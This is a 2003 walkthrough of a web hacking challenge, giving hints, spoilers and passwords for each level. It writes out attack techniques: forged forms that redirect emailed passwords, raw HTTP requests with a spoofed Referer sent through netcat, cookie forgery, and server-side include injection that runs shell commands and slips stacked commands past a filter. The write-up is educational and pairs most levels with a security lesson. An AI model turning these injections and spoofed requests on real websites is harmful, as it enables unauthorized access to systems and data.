www.hulla-balloo.

com/hack
Web Authentication Challenge Walkthrough

Aug 8, 2003
Johnny Long

This document describes how to beat the hacking challenge found at

http://www.hulla-balloo.com/hack/.

I encourage you to try the challenge yourself, then refer to this document for
hints or spoilers. It’s more fun when you do it yourself. =)

j0hnny
http://johnny.ihackstuff.com
Johnny@ihackstuff.com
 http://www.hulla-balloo.com/hack/level1/

“This level is only intended to weed out the total idiots. Enter the password and
you can advance to level 2.”

Hint: “Use the source, Luke.”

Spoiler:

The password is in the source:

The password for level 1 is ‘insanitypepper’.

Security considerations: Always read the source code. The visual representation of the
page is not what is important from a security standpoint. Comments, especially, can be
very telling.
http://www.hulla-balloo.com/hack/level2/index.php

“Network Security Sam set up a password protection script. He made it load the
real password from an unencrypted text file and compare it to the password the
user enters. However, he neglected to upload the password file...”

Hint:

Confucius say “Always test knob before declaring door locked.” (Or was that
Yoda?)

Spoiler:

The password authentication is broken and produces an error whenever a

password is entered:

Warning: Unable to access password.txt

in /home/sites/site18/web/hack/level3/index.php on line 8

Warning: fopen("password.txt", "r") - No such file or directory in

/home/sites/site18/web/hack/level3/index.php on line 8

However, if a blank password is entered, you are whicked right through to level 3:
Security Considerations: Sometimes authentication works, and sometimes it
doesn’t. Don’t always assume a password field works. Never trust that
authentication works properly. Sometime it’s just plain broke.
http://www.hulla-balloo.com/hack/level3/index.php

“This time Network Security Sam remembered to upload the password file, but
there were deeper problems then that.”

Hint:
“Learn from past mistakes. Especially Sam’s.”

More hints:

This time, Sam uploaded that password file.

What do we know about that password file?

Remember level 2’s error message:

Warning: Unable to access password.txt

in /home/sites/site18/web/hack/level3/index.php on line 8

We know that the password file is called password.txt in the /hack/level3

directory.
Spoiler:

Sam used the same naming conventions for this level as he did for the last level.
The password file is still named ‘password.txt’ but has been moved to the
‘/hack/level4’ directory. Unfortunately, the password file can be viewed
directly:

Figure 1: http://www.hulla-balloo.com/hack/level4/password.txt

The password is ‘bubbleboy’.

Security Considerations:

This example is not entirely based on reality. However, certain concepts are
interesting.

• error messages are always revealing, even when they seem out of context
• humans are creatures of habit
• look for trends across a site, and maximize on them
http://www.hulla-balloo.com/hack/level4/index.php

“This time Sam hardcoded the password into the script. However, the password
is long and complex, and Sam is often forgetful. So he wrote a script that would
email his password to him automatically in case he forgot.”

Hint:

Sam is forgetful, but you forgot the password too, right?

You have two options here. You could hack into hulla-balloo.com and steal
Sam’s email, or not send that email to hulla-balloo at all...

Spoiler:

Save the web page to your local machine and change this:

<form action="level4.php" method="post">

<input type="hidden" name="to" value="webmaster@hulla-balloo.com">
<input type="submit" value="Send password to Sam">

to this (inserting your email address instead of mine):

<form action="http://www.hulla-balloo.com/hack/level4/level4.php" method="post">

<input type="hidden" name="to" value="johnny@ihackstuff.com">
<input type="submit" value="Send password to Sam">

load the local file in your browser and click “Send password to Sam.” The email will be
sent to you. The password is 'rainbow'
http://www.hulla-balloo.com/hack/level5/index.php

“Sam has gotten wise to all the people who wrote their own forms to get the
password. Rather then actually learn the password, he decided to make his email
program a little more secure.”

Hint: Do you have any references?

Spoiler:

Save the web page to your local machine and change this:

<form action="level5.php" method="post">

<input type="hidden" name="to" value="webmaster@hulla-balloo.com">
<input type="submit" value="Send password to Sam">

to this (inserting your email address instead of mine):

<form action="http://www.hulla-balloo.com/hack/level5/level5.php" method="post">

<input type="hidden" name="to" value="johnny@ihackstuff.com">
<input type="submit" value="Send password to Sam">

load the local file in your browser and click “Send password to Sam.”
The password never arrives in your mailbox! Let’s investigate why...

Save the page locally. Change the values of this:

<form action="level5.php" method="post">

to this:

<form action="http://localhost/level5.php" method="post">

and change this:

<input type="hidden" name="to" value="webmaster@hulla-balloo.com">

to this (inserting your email address):

<input type="hidden" name="to" value="johnny@ihackstuff.com">

1. Run netcat to simulate a web server running on your local machine (localhost.)
Use the command line “nc –L –p80 –v”.
2. Click the “Send” button on your local page.
3. Netcat will show what would be sent to the hulla-balloo server when you click the
“Send” button. Netcat will show something like this:
Now, if we copy these lines which were sent to the web server:

POST /hack/level5/level5.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwav
e-flash, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: localhost
Content-Length: 24
Connection: Keep-Alive
Cache-Control: no-cache

to=johnny@ihackstuff.com

and paste them into “nc www.hulla-balloo.com 80” we get this:

the first few lines are diagnostic and can be ignored:

DNS fwd/rev mismatch: localhost != user-jxj0ar2v3y

connect to [127.0.0.1] from localhost [127.0.0.1] 3893

the next few lines are what was sent to the server:

POST /hack/level5/level5.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwav
e-flash, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705
)
Host: localhost
Content-Length: 24
Connection: Keep-Alive
Cache-Control: no-cache

to=johnny@ihackstuff.com

the lines following this are what the server sent in response:

HTTP/1.1 200 OK
Date: Thu, 24 Jul 2003 19:39:12 GMT
Server: Apache/1.3.20 Sun Cobalt (Unix) Chili!Soft-ASP/3.6.2 mod_ssl/2.8.4 OpenS
SL/0.9.6b PHP/4.1.2 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.25
X-Powered-By: PHP/4.1.2
Keep-Alive: timeout=15
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

20
Invalid referring URL. Nice try!
0

the server didn’t like what we had to say! We need to send a valid “Referer” value.

Next modify what was sent to the server. Insert this line into the header:

Referer: http://www.hulla-balloo.com/hack/level5/index.php

This is now what is sent:

POST /hack/level5/level5.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwav
e-flash, */*
Referer: http://www.hulla-balloo.com/hack/level5/index.php
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705
)
Host: www.hulla-balloo.com
Content-Length: 24
Connection: Keep-Alive
Cache-Control: no-cache

to=johnny@ihackstuff.com
Fire up netcat with “nc www.hulla-balloo.com 80” and paste in the above text. You
may need to press enter a few times after pasting the text. It should look like this:
The password will be sent to the email address entered. The password is 'smokehouse'.

Security Considerations: Never use a Referer value as a sole security measure. It can
be spoofed, even when used in combination with other methods.
http://www.hulla-balloo.com/hack/level6/index.php

“Network Security Sam has encrypted his password. The encryption system is publically
available and can be accessed with this form: Please enter a string to have it
encrypted.“

Hint: It’s not really crypto. Play.

Spoiler:

The provided form gives you a place to test the encoding scheme.
Encrypting “aaaaaaaa” gives you “abcefghi”.

Turning that into a basic algorithm, we get:

encoded_text[pos] = cleartext[pos] + (pos-1)

where pos = position of the character in the string

So, if we add 0 (zero, position minus one) to the ASCII decimal value of the first
character (a=97) in the plaintext, we get the same value:
97 + 0 = 97(a)

likewise, adding 1 (one) to the ASCII decimal value of the second character (98), we get
99:
98 + 1 = 99(b)

Our whole encoding process looks like this:

start decimal start ASCII position -1 end decimal end ASCII

97 a + 0 = 97 a
97 a + 1 = 99 b
97 a + 2 = 100 c
97 a + 3 = 101 d
97 a + 4 = 102 e
97 a + 5 = 100 f
97 a + 6 = 100 g
97 a + 7 = 100 h
97 a + 8 = 100 i

Result: ‘aaaaaaaa’ encoded is ‘abcdefghi’

Now, to decrypt, we do the reverse:

encoded_text[pos] - (pos-1) = cleartext[pos]

where pos = position of the character in the string

We know the encoded text is:

ffnrr~

So, if we subtract 0 (zero, position one minus one) from the ASCII decimal value (102)
of the first character (f) in the encoded text, we get 102 (ASCII ‘f’):

102 – 0 = 102

likewise, subtracting 1 (one, position 2 minus one) from the ASCII decimal value (102)
of the second character (f) in the encoded text, we get 101 (ASCII ‘e’):

102 – 1 = 101

Our whole decoding process looks like this:

start ASCII start char position -1 end ASCII end char

102 f - 0 = 102 f
102 f - 1 = 101 e
110 n - 2 = 108 l
114 r - 3 = 111 o
114 r - 4 = 110 n
126 ~ - 5 = 121 y

Result: ‘ffnrr~’ decoded is ‘felony’

http://www.hulla-balloo.com/hack/level7/index.php

This challenge has been removed. The password is “breathe”.

http://www.hulla-balloo.com/hack/level8/index.php

“Sam remains confident that an obscured password file is still the best idea, but he
screwed up with the calendar program. Sam has saved the unencrypted password file
in /home/sites/site18/web/hack/level8/.

However, Sam's young daughter Stephanie, has just learned to program in PHP. She's
talented for her age, but she knows nothing about security. She recently learned about
saving files, and she wrote an script to demonstrate her ability. Enter your name: “

Hint: Don’t take the bait. Some challenges may feel like they should go a certain way,
but they won’t. Make the attempt, but if there’s no sign of budging, move on.

More hints:

Figure 2: Some obvious things...

 Figure 3: ...just won't work.
Spoiler:

There are two screens to focus on. First, the php output:

Figure 4: php output

 Figure 5: and then the .shtml output

The .shtml extension on Stephanie’s response file should be an indicator here.

What does the shtml extension mean? A good definition exists at

http://searchwebservices.techtarget.com/sDefinition/0,,sid26_gci214204,00.html:

“A Web file with the suffix of ".shtml" (rather than the usual ".htm") indicates a file
that includes some information that will be added "on the fly" by the server before
it is sent to you. A typical use is to include a "Last modified" date at the bottom of
the page.

This Hypertext Transfer Protocol facility is referred to as a server-side include.

(Although rarely done, the server administrator can identify some other file name
suffix than ".shtml" as a server-side include file.) You can think of a server-side
include as a limited form of common gateway interface application. In fact, the
CGI is not used. The server simply searches the server-side include file for CGI
environment variables, and inserts the variable information in the places in the
file where the "include" statements have been inserted.”

Further researching “server-side includes” or SSI’s, we discover (again from

www.whatis.com at http://whatis.techtarget.com/definition/0,,sid9_gci214225,00.html)
that:

“A server-side include is a variable value (for example, a file "Last modified" date)
that a server can include in an HTML file before it sends it to the requestor. If
you're creating a Web page, you can insert an include statement in the HTML file
that looks like this:

<!--#echo var="LAST_MODIFIED"-->

and the server will obtain the last-modified date for the file and insert it before the
HTML file is sent to requestors. “
Normally, there is no easy way to ‘inject’ SSI includes into a web server. However, we
can assume for a moment that Stephanie’s script may provide one way of doing this.
Enter <!--#echo var="LAST_MODIFIED"--> as a name in Stephanie’s script. The
following message is produced:

“If you are trying to use server side includes to solve the challenge, you are on
the right track: but I have limited the commands allowed to ones relevant towards
finding the password file for security reasons(because there will always be that
one person who decides to execute some rather nasty commands). So please
manipulate your code so that it is a little more pertaining to the level.”

This is not a “standard” message. Instead, the author of the web page has “dumbed
down” the use of SSI’s for practical reasons (most specifically protection of his web
server ;-) It is encouraging that SSI’s are ‘on the right track.’ A great document on SSI’s
exists here: http://hoohoo.ncsa.uiuc.edu/docs/tutorials/includes.html. Reading this
document, we discover that one powerful SSI include statement looks something like
this:

<!--#exec cmd="pwd" -->

This example executes a shell command, specifically “pwd” or “print working directory.”
This command also produces the ‘on the right track’ message.

Remembering that we are supposed to be looking for a “Secret” file, we can turn our
focus to the ‘ls’ command:

<!--#exec cmd="ls" -->

This command, when entered as the name produces something like this:
Figure 6: <!--#exec cmd="ls" -->

REmember, though that the password file is not in the tmp/ directory, but rather another
level up. The most obvious way to get there is with something like this:

<!--#exec cmd="ls ../" -->

This command produces something like this:

Figure 7: <!--#exec cmd="ls ../" -->

Nestled deep inside this output is our secret file name “au12ha39vc.txt” which, when
browsed, gives us the password:

Figure 8: The password

Security Considerations: Never allow unchecked user input into dynamic html.
http://www.hulla-balloo.com/hack/level9/index.php

“Network Security Sam is going down with the ship - he's determined to keep
obscuring the password file, no matter how many times people manage to
recover it. This time the file is saved in /home/sites/site18/web/hack/level9/.

In the last level, however, in my attempt to limit people to using server side
includes to display the directory listing to level 8 only, I have mistakenly screwed
up somewhere.. there is a way to get the obscured level 9 password. See if you
can figure out how...

This level seems a lot trickier then it actually is, and it helps to have an
understanding of how the script validates the user's input. The script finds the
first occurance of '<--', and looks to see what follows directly after it. If it matches
"#exec cmd="ls"-->", "#exec cmd="ls /home/sites/site18/web/hack/level8/"-->" or
"#exec cmd="ls /home/sites/site18/web/hack/level8"-->", it accepts it. If it does
not match any of the situations above, then it kicks the user out.”

Hint: Layout what, exactly, worked for the previous level. These are the keys to this
level. Provide the key to allow access to better, more relevant commands.

The accepted commands to input into level 8 are:

<!--#exec cmd="ls"-->
<!--#exec cmd="ls /home/sites/site18/web/hack/level8/"-->
<!--#exec cmd="ls /home/sites/site18/web/hack/level8"-->

What didn’t work:

At first, it seemed logical to use Unicode here. The logic goes something like this: if we
can slip some characters past the detector, perhaps we can get the detector to not
notice us. (A good reference for Unicode use on the web is here:
http://www.pemberley.com/janeinfo/latin1.html)

For starters, consider the following:

&#60!--#exec cmd="ls" -->

The “&#60” above is Unicode for the less-than symbol. When processed by the web
server, this command looks like this:

<!--#exec cmd="ls" -->

Tested against the web server, here are the results:

Figure 9: Unicode attempt

Although the Unicode slipped past the detector, the shtml does not execute the
command as expected. Dead end. On to another idea: command stacking. Perhaps
more than one command can be stacked one on top of another. Some simple
examples:

<!--#exec cmd="ls" --><!--#exec cmd="ls ../"-->

<!--#exec cmd="ls" --><!--#exec cmd="ls /home/sites/site18/web/hack/level9”-->

Notice that in each example the detector would allow the first command in each “stack.”
Both of these commands, when entered into the “Enter your name” field in level 8
produce the following result:

Figure 10: Stacking Failure

Admittedly, this level is extremely sensitive to syntax. However, after much trial and
error, the accepted string becomes:
<!--#exec cmd="ls /home/sites/site18/web/hack/level8/"--><!--#exec cmd="ls /home/sites/site18/web/hack/level9/"-->

This string produces the following .shtml file:

Figure 11: Successful Stacking

By following the link to http://www.hulla-balloo.com/hack/level9/p9ie283zc3.txt, we

discover the level 10 password:
http://www.hulla-balloo.com/hack/level10/index.php

“Network Security Sam has decided to hardcode the password into the script. He also
started to use cookies to detect if the user is authorized to advance to the next level.
When you enter the correct password, it sets you to authorized, and if you enter an
incorrect password, it sets you to unauthorized.”

Hint: Coookie. Coookie. Cooooooookie.

Spoiler:

Dropping in the password from the last level and sniffing the traffic, we discover that the
site is setting a cookie:

The cookie, “level11_authorized” is set to “no”. The most obvious approach is to

set this value to “yes”.

The destination of the POST this time is “/hack/level11/index.php”.

The password will be the same as the previous level, “childhood”.

Using the techniques described earlier, this HTTP POST can be sent to the server:

POST /hack/level11/index.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: www.hulla-balloo.com
Cookie: level11_authorized=yes
Content-Length: 18
Connection: Keep-Alive
Cache-Control: no-cache

password=childhood

The response from the server looks like this:

Question: What’s wrong with this picture?

Notice the strange HTML in the server response... We missed something.In order to
gather more information, netcat is instructed to capture traffic in hex with the ‘–o
filename’ switch:

nc.exe www.hulla-balloo.com 80 -o level10.txt

After posting this request into netcat, viewing the level10.txt file reveals:

Figure 12: The cookie stuck. ‘level11_authorized’ is set to ‘yes’.

Figure 13: The password is revealed as ‘spiral’.

http://www.hulla-balloo.com/hack/level11/index.php
and
http://www.hulla-balloo.com/hack/level11/index.php

Sadly, the challenge starts to fall apart right around level 11. Levels 11 and 12 are really
the same as level 10.

Hint: Cooookie. Coookie. Coooookie.

Spoiler:

Change the appropriate URLs, and try again. Simply paste in the POST to netcat like
so:

POST /hack/level12/index.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: www.hulla-balloo.com
Cookie: level12_authorized=yes
Content-Length: 18
Connection: Keep-Alive
Cache-Control: no-cache

password=spiral

The result will look something like this:

The password for level 12 is ‘durchfall’.

Now the “hard part” is figuring out how to get your name and comments in the high
score listing. I forgot that the top score list (http://www.hulla-
balloo.com/hack/topscores.php) actually has a form at the bottom for submitting high
scores. The ending is very anti-climactic... sorry! =(

http://www.hulla-balloo.com/hack/level8/level8.php?fs=/hack/level8/index.php?
password=CENSORED

Final Notes:

There are easier ways to skin a cat! Thanks to Wolfman <Wolfman@deny.de> over at
http://wolfman.deny.de comes HAS (Hephaestus's Ashen Spear). According to
Wolfman:

“Hephaestus's Ashen Spear (HAS) is a tool to test weak CGI's on your

webserver. It's buildt around the use of templates to make it flexible
enough to use with most CGI's and PHP. It should be able to work with
any kind of webpage that requires POST or GET. If your able to find a
weakness that allows you to make a shell/pipe commands to remote system
, then you can start taking advantage of the Visual *Nix filesystem
browser. This does not have all system commands, but there is a
commandline like feature that will allow you to unleash your own
skills. HAS can even help out with uploading textbased files like CGI
and PHP scripts to the server. With HAS you can see how secure your
servers CGI's and file system rights really are.”

HAS really simplifies the process of going through this challenge. Here’s Wolfman’s
comments on completing the challenge using HAS insted of Netcat:

Level 4

CGI with full path

http://www.hulla-balloo.com/hack/level4/level4.php

CGI params
to=wolfman@deny.de

Comment
Password script will allow GET as well as post
Submit buttons value is not use/check in script so can be obmitted

So you could do this in your browser

http://www.hulla-balloo.com/hack/level4/level4.php?to=wolfman@deny.de

Insted of saving form and editing.

Level 5

CGI with full path

http://www.hulla-balloo.com/hack/level5/level5.php

CGI params
to=wolfman@deny.de
Getting Invalide referer

Go to Connection options
Custom refferer = http://www.hulla-balloo.com/hack/level5/index.php

Comment
A bit less hassle then using NetCat.
Once agian the server will allow both GET and POST.

Level 10
CGI with full path
http://www.hulla-balloo.com/hack/level11/index.php

CGI params
password=childhood

Comment
Sniffer is the natural choice, but when it's just a cookie , HAS can be used
to see it.
Connection options, check "Show headers /Debug" this will make another tab
visible that
will show all headers sendt to and from server.
Here you can find Set-Cookie: level11_authorized=no

Under Connection options you can also set your own cookies.
Custom cookie = level11_authorized=yes

To read server awnser more easy , hit Render HTM view button on leftside of
server reply.